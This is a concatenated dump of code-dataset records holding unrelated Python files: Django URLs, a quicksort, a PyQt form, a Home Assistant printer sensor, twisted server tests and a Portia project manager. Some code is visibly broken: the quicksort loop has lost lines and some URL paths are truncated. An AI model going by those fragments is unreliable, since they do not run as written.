Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n#from jet.dashboard.dashboard_modules import yandex_metrika_views\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls.static import static\n\nimport debug_toolbar\n\nfrom django.conf import settings\nfrom empresa.admin import SucursalAdmin, Grupo_EmpresarialAdmin, AreasAdmin\nfrom articulos.admin import ArticulosAdmin, PresentacionArticulosAdmin, MarcaArticulosAdmin\n#from articulos.views import vista_presentaciones\nfrom articulos.views import PresentacionesListView, PresentacionesCreate\nfrom recetas.admin import RecetasAdmin, EspecificacionesAdmin, CategoriasAdmin\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('__debug__/', include(debug_toolbar.urls)),\n    #path('jet/', include('jet.urls', 'jet')), # Django JET URLS\n    #path('jet/dashboard/', include('jet.dashboard.urls', 'jet-dashboard')),\n    path('grappelli/', include('grappelli.urls')), # grappelli URLS\n    path('nested_admin/', include('nested_admin.urls')),\n    #path('admin_tools/', include('admin_tools.urls')),\n    path('empresa/', SucursalAdmin.llenar_combo_empresas, name='llenar_combo_empresas'),\n    path('empresa/municipios/', Grupo_EmpresarialAdmin.llenar_combo_municipios, name='llenar_combo_municipios') ,\n    path('empresa/localidades/', Grupo_EmpresarialAdmin.llenar_combo_localidades, name='llenar_combo_localidades') ,\n    path('empresa/sucursales/', AreasAdmin.llenar_combo_sucursales, name='llenar_combo_sucursales') ,\n    path('empresa/areas/', AreasAdmin.llenar_combo_areas, name='llenar_combo_areas') ,\n    path('articulos/subfamilias/', ArticulosAdmin.llenar_combo_subfamilias, name='llenar_combo_subfamilias') ,\n    path('articulos/presentaciones//', PresentacionesListView.as_view(), name='presentaciones'),\n    path('articulos/presentaciones/crear/', PresentacionesCreate.as_view(), name='crear_presentaciones'),\n    path('articulos/presentaciones/', PresentacionArticulosAdmin.obtener_datos_articulo, name='obtener_datos_articulo') ,\n    path('articulos/marcas/', MarcaArticulosAdmin.obtener_datos_articulo_marca, name='obtener_datos_articulo_marca') ,\n    path('articulos/prefijo_subfamilias/', ArticulosAdmin.obtener_prefijo_subfamilia, name='obtener_prefijo_subfamilia') ,\n    path('articulos/marcas_art/', MarcaArticulosAdmin.valida_marca_no_existente, name='valida_marca_no_existente') ,\n    path('articulos/recetas/', RecetasAdmin.obtener_datos_receta, name='obtener_datos_receta') ,\n    path('articulos/ingredientes/', RecetasAdmin.obtener_unidad_medida_ingrediente, name='obtener_unidad_medida_ingrediente') ,\n\n    path('articulos/ingredientes_elemento/', EspecificacionesAdmin.obtener_ingredientes_elemento, name='obtener_ingredientes_elemento') ,\n\n    path('recetas/categorias_menu/', CategoriasAdmin.filtra_categorias_menu, name='filtra_categorias_menu') ,\n\n\n]\n#path('articulos/presentacion_articulos/(?P\\d+)/$', vista_presentaciones, name='presentaciones_articulo'),\n# To serve uploaded images while in debug mode\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nadmin.site.site_header = \"Administrador del sistema\"\nadmin.site.site_title = \"Portal de Administración\"\nadmin.site.index_title = \"Bienvenido al Portal de 
Administrador\"","sub_path":"controlinv/controlinv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22093339","text":"#!/usr/bin/python\n\n\nclass Quicksort(object):\n\n\tdef __init__(self,arreglo):\n\t\tself.arreglo = arreglo\n\n\tdef ordena(self):\n\t\tlast = (len(self.arreglo)-1) \n\t\tself.quicksort(self.arreglo, 0, last )\n\n\tdef quicksort(self,arreglo,first,last):\n\t\tif (first >= last): \n\t\t\treturn\n\n\t\tpivoteIndex = int((first + last) / 2)\n\t\tpivote = arreglo[pivoteIndex]\n\t\tprint(\"first = %s last = %s\",first,last)\n\t\tprint(\"pivoteIndex = %s valor pivote = %s\",pivoteIndex,pivote)\n\t\tprint(\"arreglo inicio = %s\",arreglo)\n\t\ti = first\n\t\tj = last\n\n\t\twhile i pivote:\n\t\t\t\tj -= 1\n\n\t\t\tif i < j :\n\t\t\t\tprint(\"intercambiando %s con %s\",i,j)\n\t\t\t\tx = arreglo[i]\n\t\t\t\tarreglo[i] = arreglo[j]\n\t\t\t\tarreglo[j] = x\n\t\t\telse :\n\t\t\t\tbreak\n\t\t\tprint(\"arreglo = %s\",arreglo)\n\n\t\tprint(\"arreglo fin = %s\",arreglo)\n\t\tself.quicksort(arreglo, first, j-1)\n\t\tself.quicksort(arreglo, i+1, last)\n\n\n\nb = Quicksort([2,7,50,3,93,1,4,33,5])\nb.ordena()\nprint(\"Final = %s\", b.arreglo)\n","sub_path":"python/cosasDesorganizadas/algoritmosDeOrdenamiento/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"518848314","text":"# -*- coding: utf-8 -*-\n\ntabby_cat = \"\\tI will become a tab.\"\npersian_cat = \"I'm \\n separate.\"\nbackslash_cat = \"I'm \\\\ c \\\\ at.\"\n\nfat_cat = \"\"\"\nto do list:\n\\t* cat's meal\n\\t* fishes\n\\t* duck\\n\\t* bird\n\"\"\"\n\nprint(tabby_cat)\nprint(persian_cat)\nprint(backslash_cat)\nprint(fat_cat)\n\n","sub_path":"practise_example_code/ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"53896623","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom settings import *\n\nclass NewUserWindow(QtWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n\n self.setObjectName(\"NewUserWindow\")\n self.resize(395, 435)\n self.setMinimumSize(QtCore.QSize(395, 435))\n self.setMaximumSize(QtCore.QSize(395, 435))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(IMAGES_DIR+\"icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n self.setStyleSheet(\"background-color: #414053;\")\n\n self.centralwidget = QtWidgets.QWidget(self)\n self.centralwidget.setObjectName(\"central_widget\")\n\n self.verticalWidget = QtWidgets.QWidget(self.centralwidget)\n self.verticalWidget.setGeometry(QtCore.QRect(40, 20, 321, 381))\n self.verticalWidget.setStyleSheet(\"\"\"QLineEdit {\n color: white;\n }\"\"\")\n self.verticalWidget.setObjectName(\"verticalWidget\")\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalWidget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n\n self.newUserLabel = QtWidgets.QLabel(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.newUserLabel.sizePolicy().hasHeightForWidth())\n\n 
self.newUserLabel.setSizePolicy(sizePolicy)\n self.newUserLabel.setMaximumSize(QtCore.QSize(16777215, 100))\n\n font = QtGui.QFont()\n font.setPointSize(16)\n\n self.newUserLabel.setFont(font)\n self.newUserLabel.setStyleSheet(\"color: white;\")\n self.newUserLabel.setAlignment(QtCore.Qt.AlignCenter)\n self.newUserLabel.setObjectName(\"newUserLabel\")\n\n self.verticalLayout.addWidget(self.newUserLabel)\n\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem)\n self.profilePhoto = QtWidgets.QPushButton(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.profilePhoto.sizePolicy().hasHeightForWidth())\n\n self.profilePhoto.setSizePolicy(sizePolicy)\n self.profilePhoto.setMaximumSize(QtCore.QSize(200, 120))\n\n font.setPointSize(14)\n\n self.profilePhoto.setFont(font)\n self.profilePhoto.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.profilePhoto.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.profilePhoto.setLayoutDirection(QtCore.Qt.LeftToRight)\n\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(IMAGES_DIR+\"users_photo/default.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n self.profilePhoto.setIcon(icon1)\n self.profilePhoto.setIconSize(QtCore.QSize(50, 50))\n self.profilePhoto.setFlat(True)\n self.profilePhoto.setObjectName(\"profilePhoto\")\n\n self.verticalLayout.addWidget(self.profilePhoto, 0, QtCore.Qt.AlignHCenter)\n\n spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem1)\n\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n\n self.name = QtWidgets.QLabel(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.name.sizePolicy().hasHeightForWidth())\n\n self.name.setSizePolicy(sizePolicy)\n self.name.setMaximumSize(QtCore.QSize(100, 45))\n\n font.setPointSize(14)\n\n self.name.setFont(font)\n self.name.setStyleSheet(\"color: white;\")\n self.name.setAlignment(QtCore.Qt.AlignCenter)\n self.name.setObjectName(\"name\")\n \n self.horizontalLayout_3.addWidget(self.name)\n self.name_edit = QtWidgets.QLineEdit(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.name_edit.sizePolicy().hasHeightForWidth())\n\n self.name_edit.setSizePolicy(sizePolicy)\n self.name_edit.setAlignment(QtCore.Qt.AlignCenter)\n self.name_edit.setPlaceholderText(\"\")\n self.name_edit.setObjectName(\"name_edit\")\n\n self.horizontalLayout_3.addWidget(self.name_edit)\n\n self.verticalLayout.addLayout(self.horizontalLayout_3)\n\n spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem2)\n\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n\n self.last_name = QtWidgets.QLabel(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, 
QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.last_name.sizePolicy().hasHeightForWidth())\n\n self.last_name.setSizePolicy(sizePolicy)\n self.last_name.setMaximumSize(QtCore.QSize(100, 45))\n\n font.setPointSize(14)\n\n self.last_name.setFont(font)\n self.last_name.setStyleSheet(\"color: white;\")\n self.last_name.setAlignment(QtCore.Qt.AlignCenter)\n self.last_name.setObjectName(\"last_name\")\n\n self.horizontalLayout.addWidget(self.last_name)\n\n self.surname_edit = QtWidgets.QLineEdit(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.surname_edit.sizePolicy().hasHeightForWidth())\n\n self.surname_edit.setSizePolicy(sizePolicy)\n self.surname_edit.setAlignment(QtCore.Qt.AlignCenter)\n self.surname_edit.setObjectName(\"surname_edit\")\n\n self.horizontalLayout.addWidget(self.surname_edit)\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n\n spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem3)\n\n self.create_button = QtWidgets.QPushButton(self.verticalWidget)\n\n font.setPointSize(16)\n\n self.create_button.setFont(font)\n self.create_button.setStyleSheet(\"background-color: green;color: white;\")\n self.create_button.setObjectName(\"create_button\")\n\n self.verticalLayout.addWidget(self.create_button)\n\n self.setCentralWidget(self.centralwidget)\n \n self.statusbar = QtWidgets.QStatusBar(self)\n self.statusbar.setObjectName(\"statusbar\")\n self.setStatusBar(self.statusbar)\n\n self.retranslate_ui()\n QtCore.QMetaObject.connectSlotsByName(self)\n\n def retranslate_ui(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"NewUserWindow\", \"Новый пользователь\"))\n self.newUserLabel.setText(_translate(\"NewUserWindow\", \"Создать нового пользователя:\"))\n self.name.setText(_translate(\"NewUserWindow\", \"Имя :\"))\n self.last_name.setText(_translate(\"NewUserWindow\", \"Фамилия: \"))\n self.create_button.setText(_translate(\"NewUserWindow\", \"Создать\"))\n","sub_path":"src/user_form.py","file_name":"user_form.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118345437","text":"import logging\nimport json\nimport urllib.request \nfrom datetime import timedelta\nfrom datetime import datetime\n\nimport voluptuous as vol\n\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nfrom homeassistant.const import (\n CONF_NAME, CONF_HOST, CONF_MONITORED_CONDITIONS)\n\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_IP = '127.0.0.1'\n\nSCAN_INTERVAL = timedelta(minutes=60)\n\nMONITORED_CONDITIONS = { \n 'black': ['Inklevel Black', '%', 'mdi:water'],\n 'magenta': ['Inklevel Magenta', '%', 'mdi:water'],\n 'cyan': ['Inklevel Cyan', '%', 'mdi:water'],\n 'yellow': ['Inklevel Yellow', '%', 'mdi:water'],\n 'clean': ['Inklevel Cleaning', '%', 'mdi:water'],\n}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_HOST, default=DEFAULT_IP): cv.string,\n vol.Required(CONF_MONITORED_CONDITIONS, default=MONITORED_CONDITIONS):\n vol.All(cv.ensure_list, 
[vol.In(MONITORED_CONDITIONS)]),\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the cartridge sensor.\"\"\"\n host = config.get(CONF_HOST)\n \n \"\"\"Set up the printer API.\"\"\"\n api = EpsonPrinter(host)\n\n sensors = [EpsonPrinterCartridge(hass, api, condition)\n for condition in config[CONF_MONITORED_CONDITIONS]]\n\n add_devices(sensors, True)\n\n\nclass EpsonPrinterCartridge(Entity):\n \"\"\"Representation of a cartdige sensor.\"\"\"\n\n def __init__(self, hass, api, variable):\n \"\"\"Initialize a cartridge sensor.\"\"\"\n self._hass = hass\n self._api = api\n \n variable_info = MONITORED_CONDITIONS[variable]\n self._var_name = variable_info[0]\n self._var_id = variable;\n self._var_unit = variable_info[1]\n self._var_icon = variable_info[2] \n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._var_name\n\n @property\n def icon(self):\n \"\"\"Icon to use in the frontend, if any.\"\"\"\n return self._var_icon\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit the value is expressed in.\"\"\"\n return self._var_unit\n \n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n return self._api.getSensorValue(self._var_id)\n\n @property\n def available(self):\n \"\"\"Could the device be accessed during the last update call.\"\"\"\n return self._api.available\n\n def update(self):\n \"\"\"Get the latest data from the Epson printer.\"\"\"\n self._api.update()\n\n\nclass EpsonPrinter(object):\n def __init__(self, ip):\n \"\"\"Initialize the link to the printer status page.\"\"\" \n self._resource = \"http://\"+ip+\"/PRESENTATION/HTML/TOP/PRTINFO.HTML\" \n self.data = None\n self.available = True\n self.update()\n \n def getSensorValue(self,sensor):\n \"\"\"To make it the user easier to configre the cartridge type.\"\"\"\n sensorCorrected = \"\";\n _LOGGER.debug(\"Color to fetch: \"+sensor)\n if sensor == \"black\":\n sensorCorrected = \"K\"\n elif sensor == \"magenta\":\n sensorCorrected = \"M\"\n elif sensor == \"cyan\":\n sensorCorrected = \"C\"\n elif sensor == \"yellow\":\n sensorCorrected = \"Y\"\n elif sensor == \"clean\":\n sensorCorrected = \"Waste\"\n else:\n return \"0\";\n \n try:\n search = \"Ink_\"+sensorCorrected+\".PNG' height='\"\n result = self.data.index(search) \n startPos = result+len(search) \n valueRaw = self.data[startPos:startPos+2]\n \"\"\"In case the value is a single digit, we will get a ' char, remove it.\"\"\"\n return valueRaw.replace(\"'\", \"\")\n except Exception as e:\n _LOGGER.error(\"Unable to fetch level from data: \"+str(e))\n return \"0\"\n\n def update(self):\n try: \n \"\"\"Just fetch the HTML page.\"\"\" \n response = urllib.request.urlopen(self._resource)\n self.data = response.read().decode(\"utf-8\")\n self.available = True\n except Exception as e:\n _LOGGER.error(\"Unable to fetch data from your printer: \"+str(e))\n self.available = False\n","sub_path":"custom_components/sensor/epsonprinter.py","file_name":"epsonprinter.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"214595639","text":"# edge case: 1 vs 1.0, 1.001 vs 1.01\n\n\nclass Solution(object):\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n def getArr(version):\n arr = version.split(\".\")\n arr = map(int, arr)\n while arr and arr[-1] == 0: # mistake: don't forget this step\n arr.pop()\n 
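# trailing zero components are stripped, so e.g. \"1.0\" and \"1.0.0\" compare equal to \"1\"\n            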
return arr\n arr1 = getArr(version1)\n arr2 = getArr(version2)\n \n i, j = 0, 0\n while i < len(arr1) and j < len(arr2):\n if arr1[i] == arr2[j]:\n i, j = i+1, j+1\n elif arr1[i] > arr2[j]: # larger\n return 1\n else: # smaller\n return -1\n if i == len(arr1) and j == len(arr2): # equal\n return 0\n if i == len(arr1): # smaller\n return -1\n return 1\n\n\n\"\"\"\nCompare two version numbers version1 and version2.\nIf version1 > version2 return 1; if version1 < version2 return -1; \notherwise return 0.\n\nYou may assume that the version strings are non-empty and contain only digits and the . character.\n\nThe . character does not represent a decimal point and is used to separate number sequences.\n\nFor instance, 2.5 is not \"two and a half\" or \"half way to version three\", \nt is the fifth second-level revision of the second first-level revision.\n\nYou may assume the default revision number for each level of a version number to be 0. \nFor example, version number 3.4 has a revision number of 3 and 4 for its first and second level revision number. \nIts third and fourth level revision number are both 0.\n\n \n\nExample 1:\n\nInput: version1 = \"0.1\", version2 = \"1.1\"\nOutput: -1\nExample 2:\n\nInput: version1 = \"1.0.1\", version2 = \"1\"\nOutput: 1\nExample 3:\n\nInput: version1 = \"7.5.2.4\", version2 = \"7.5.3\"\nOutput: -1\nExample 4:\n\nInput: version1 = \"1.01\", version2 = \"1.001\"\nOutput: 0\nExplanation: Ignoring leading zeroes, both “01” and “001\" represent the same number “1”\nExample 5:\n\nInput: version1 = \"1.0\", version2 = \"1.0.0\"\nOutput: 0\nExplanation: The first version number does not have a third level revision number, \nwhich means its third level revision number is default to \"0\"\n \n\nNote:\n\nVersion strings are composed of numeric strings separated by dots . and this numeric strings may have leading zeroes.\nVersion strings do not start or end with dots, and they will not be two consecutive dots.\n\"\"\"\n","sub_path":"0165. Compare Version Numbers.py","file_name":"0165. 
Compare Version Numbers.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332795186","text":"import pytest\nfrom http_server_async import HTTPResponder\n\n\n@pytest.fixture(scope='function')\ndef make_get_responder():\n gr = HTTPResponder()\n return gr\n\n\n@pytest.fixture(scope='function')\ndef make_request():\n from twisted.web.http import HTTPChannel\n hc = HTTPChannel()\n from twisted.web.http import Request\n rq = Request(hc, None)\n return rq\n\n\ndef test_dot_dot(make_get_responder, make_request):\n from twisted.web import resource\n gr = make_get_responder\n r = make_request\n r.uri = 'images/sample.._1.png'\n response = gr.render(r)\n page = resource.ForbiddenResource(message=\"Sorry, resource is forbidden.\")\n assert response == page.render(r)\n\n\ndef test_image(make_get_responder, make_request):\n path = \"webroot/images/sample_1.png\"\n make_request.method = \"GET\"\n make_request.uri = \"/images/sample_1.png\"\n make_request.clientproto = \"HTTP/1.1\"\n\n response = make_get_responder.render(make_request)\n body = None\n with open(path) as f:\n body = f.read()\n assert response == body\n\n\ndef test_txt_file(make_get_responder, make_request):\n path = \"webroot/sample.txt\"\n make_request.method = \"GET\"\n make_request.uri = \"/sample.txt\"\n make_request.clientproto = \"HTTP/1.1\"\n\n response = make_get_responder.render(make_request)\n body = None\n with open(path) as f:\n body = f.read()\n assert response == body\n\n\ndef test_404_error(make_get_responder, make_request):\n from twisted.web import resource\n make_request.method = \"GET\"\n make_request.uri = \"/not_there.txt\"\n make_request.clientproto = \"HTTP/1.1\"\n\n response = make_get_responder.render(make_request)\n page = resource.NoResource(\n message=\"Sorry. 
No luck finding that resource.\")\n error = page.render(make_request)\n assert response == error\n\n\ndef test_505_error(make_get_responder, make_request):\n from twisted.web import resource\n make_request.method = \"GET\"\n make_request.uri = \"/\"\n make_request.clientproto = \"HTTP/1.0\"\n\n response = make_get_responder.render(make_request)\n page = resource.ErrorPage(\n 505, \"Not Supported\",\n \"The server refuses to support the HTTP protocol version \"\n \"used in the request message.\")\n error = page.render(make_request)\n assert response == error\n\n\ndef test_501_error(make_get_responder, make_request):\n from twisted.web import resource\n make_request.method = \"SET\"\n make_request.uri = \"/\"\n make_request.clientproto = \"HTTP/1.0\"\n\n response = make_get_responder.render(make_request)\n page = resource.ErrorPage(\n 501, \"Not Implemented\",\n \"The server does not support the functionality required \"\n \"to fulfill the request.\")\n error = page.render(make_request)\n assert response == error\n","sub_path":"test_http_server_async.py","file_name":"test_http_server_async.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128768502","text":"from __future__ import absolute_import\nimport errno\nimport json\nimport os\nimport re\n\nfrom os.path import join\nfrom twisted.internet.defer import Deferred\nfrom twisted.web.resource import NoResource\nfrom twisted.web.server import NOT_DONE_YET\nfrom .errors import BaseError, BaseHTTPError, BadRequest\nfrom .projecttemplates import templates\nfrom .resource import SlydJsonObjectResource, SlydJsonErrorPage\nfrom .utils.copy import FileSystemSpiderCopier\nfrom .utils.download import ProjectArchiver, CodeProjectArchiver\nfrom .utils.storage import ContentFile, FsStorage\n\n\n# stick to alphanum . and _. 
Do not allow only .'s (so safe for FS path)\n_INVALID_PROJECT_RE = re.compile('[^A-Za-z0-9._]|^\\.*$')\n\n\ndef create_projects_manager_resource(spec_manager):\n    return ProjectsManagerResource(spec_manager)\n\n\nclass ProjectsManagerResource(SlydJsonObjectResource):\n\n    def __init__(self, spec_manager):\n        SlydJsonObjectResource.__init__(self)\n        self.spec_manager = spec_manager\n\n    def getChildWithDefault(self, project_path_element, request): # project_path_element: \n        # check the current user's access permissions\n        auth_info = request.auth_info\n        if ('authorized_projects' not in auth_info or\n                auth_info.get('staff', False) or # staff users may access any project\n                project_path_element in auth_info['authorized_projects']):\n            \n            request.project = project_path_element # \n            try:\n                next_path_element = request.postpath.pop(0)\n            except IndexError:\n                next_path_element = 'spec' # /projects/ is automatically treated as: /projects//spec\n            \n            # self.children: attribute defined on the base Resource class; it holds every child registered via putChild()\n            # calling putChild(path, child) does: self.children[path] = child\n            if next_path_element not in self.children: # the keys of children here include: 'spec', 'bot'\n                raise NoResource(\"No such child resource.\") # the path must match projects//spec or projects//bot\n\n            request.prepath.append(project_path_element) # [ 'projects', ]\n            return self.children[next_path_element] # getChild() is not implemented, so self.children is accessed directly\n        else:\n            # no access permission: return an error page\n            return SlydJsonErrorPage(\n                403, \"Forbidden\", \"You don't have access to this project.\")\n\n    # called by render_POST()\n    def handle_project_command(self, projects_manager, command_spec):\n        command = command_spec.get('cmd')\n        dispatch_func = projects_manager.project_commands.get(command)\n        if dispatch_func is None:\n            self.bad_request(\n                \"Unrecognised command %s, available commands: %s.\" %\n                (command, ', '.join(projects_manager.project_commands.keys())))\n        args = command_spec.get('args', [])\n        try:\n            retval = dispatch_func(*args)\n        except TypeError:\n            self.bad_request(\"Incorrect arguments for command %s.\" % command)\n        except OSError as ex:\n            if ex.errno == errno.ENOENT:\n                self.not_found()\n            elif ex.errno == errno.EEXIST or ex.errno == errno.ENOTEMPTY:\n                self.bad_request(\"A project with that name already exists.\")\n            raise\n        except BaseError as ex:\n            self.error(ex.status, ex.title, ex.body)\n        else:\n            return retval or ''\n        return ''\n\n    # \n    def render_GET(self, request):\n        auth_info = request.auth_info\n        project_manager = self.spec_manager.project_manager(auth_info)\n        projects = project_manager.list_projects()\n        for project in projects:\n            project_spec = self.spec_manager.project_spec(project['id'], auth_info)\n            project['spiders'] = list(project_spec.list_spiders())\n\n        return {\n            \"projects\": projects\n        }\n\n    def render_POST(self, request):\n\n        def finish_request(val):\n            if modifier:\n                val = modifier(request, obj, val)\n            val and request.write(val)\n            request.finish()\n\n        def request_failed(failure):\n            request.setResponseCode(500)\n            request.write(failure.getErrorMessage())\n            request.finish()\n            return failure\n\n        project_manager = self.spec_manager.project_manager(request.auth_info)\n        project_manager.request = request\n        obj = self.read_json(request)\n        try:\n            retval = self.handle_project_command(project_manager, obj)\n            modifier = project_manager.modify_request.get(obj.get('cmd'))\n            if isinstance(retval, Deferred):\n                retval.addCallbacks(finish_request, request_failed)\n                return NOT_DONE_YET\n            else:\n                if modifier:\n                    retval = modifier(request, obj, retval)\n                return retval\n        except BaseHTTPError as ex:\n            self.error(ex.status, ex.title, ex.body)\n\n\ndef allowed_project_name(name):\n    return not 
_INVALID_PROJECT_RE.search(name)\n\n# base class: manages the projects repository\nclass ProjectsManager(object):\n\n    @classmethod\n    def setup(cls, location, **kwargs):\n        cls.base_dir = location\n\n    def __init__(self, auth_info):\n        # authentication and authorization info for the current user\n        self.auth_info = auth_info\n        self.user = auth_info['username']\n        \n        # \n        self.modify_request = {\n            'download': self._render_file\n        }\n        \n        # project commands: create, move, remove, copy, download\n        self.project_commands = {\n            'create': self.create_project, # the corresponding handler\n            'mv': self.rename_project,\n            'rm': self.remove_project,\n            'copy': self.copy_data,\n            'download': self.download_project\n        }\n\n    def run(self, callback, **kwargs):\n        return callback(**kwargs)\n\n    # operation: list all projects\n    def all_projects(self):\n        raise NotImplementedError\n\n    # operation: list all projects (that the user may access)\n    def list_projects(self):\n        if 'authorized_projects' in self.auth_info:\n            return self.auth_info['authorized_projects']\n        else:\n            return list(self.all_projects())\n\n    # operation: create a project\n    def create_project(self, name):\n        self.validate_project_name(name)\n        project_filename = self.project_filename(name)\n        \n        # the set of files contained in a project (generated from templates)\n        # project.json\n        # scrapy.cfg\n        # setup.py\n        # items.json\n        # spiders\n        # __init__.py\n        # settings.py\n        project_files = {\n            'project.json': templates['PROJECT'], # a template is just a big string\n            'scrapy.cfg': templates['SCRAPY'],\n            'setup.py': templates['SETUP'] % str(name),\n            'items.json': templates['ITEMS'],\n            join('spiders', '__init__.py'): '',\n            join('spiders', 'settings.py'): templates['SETTINGS'],\n        }\n        \n        # create the file tree for the new project\n        for filename, template in project_files.items():\n            path = join(project_filename, filename)\n            # write the file through the storage attribute's save() method\n            self.storage.save(path, ContentFile(template, path)) # the storage attribute is defined by subclasses\n\n    # operation: rename a project\n    def rename_project(self, from_name, to_name):\n        self.validate_project_name(from_name)\n        self.validate_project_name(to_name)\n        # move the directory through the storage attribute's move() method\n        self.storage.move(self.project_filename(from_name),\n                          self.project_filename(to_name))\n\n    # operation: remove a project\n    def remove_project(self, name):\n        # delete the directory tree through the storage attribute's rmtree() method\n        self.storage.rmtree(self.project_filename(name))\n\n    # operation\n    def edit_project(self, name, revision=None):\n        # Do nothing here, but subclasses can use this method as a hook\n        # e.g. to import projects from another source.\n        return\n\n    # helper: check that the project name is valid (raises if it is not)\n    def validate_project_name(self, name):\n        if not allowed_project_name(name):\n            raise BadRequest('Bad Request', 'Invalid project name %s.' 
% name)\n\n    # operation\n    def copy_data(self, source, destination, spiders, items):\n        raise NotImplementedError\n\n    # operation\n    def download_project(self, name, spiders=None, version=None, **kwargs):\n        raise NotImplementedError\n\n    # operation: commit pending changes\n    def commit_changes(self):\n        if getattr(self, 'storage', None):\n            # commit through the storage attribute's commit() method\n            self.storage.commit()\n\n    def _render_file(self, request, request_data, body):\n        name = request_data.get('args')[0].encode('utf-8')\n        request.setHeader('Content-Type', 'application/zip')\n        request.setHeader('Content-Disposition', 'attachment; '\n                          'filename=\"%s.zip\"' % name)\n        request.setHeader('Content-Length', len(body))\n        return body\n\n    def __repr__(self):\n        return '%s(%s)' % (self.__class__.__name__, str(self))\n\n    def __str__(self):\n        return '%s' % self.user\n\n# projects manager backed by the local filesystem\n# 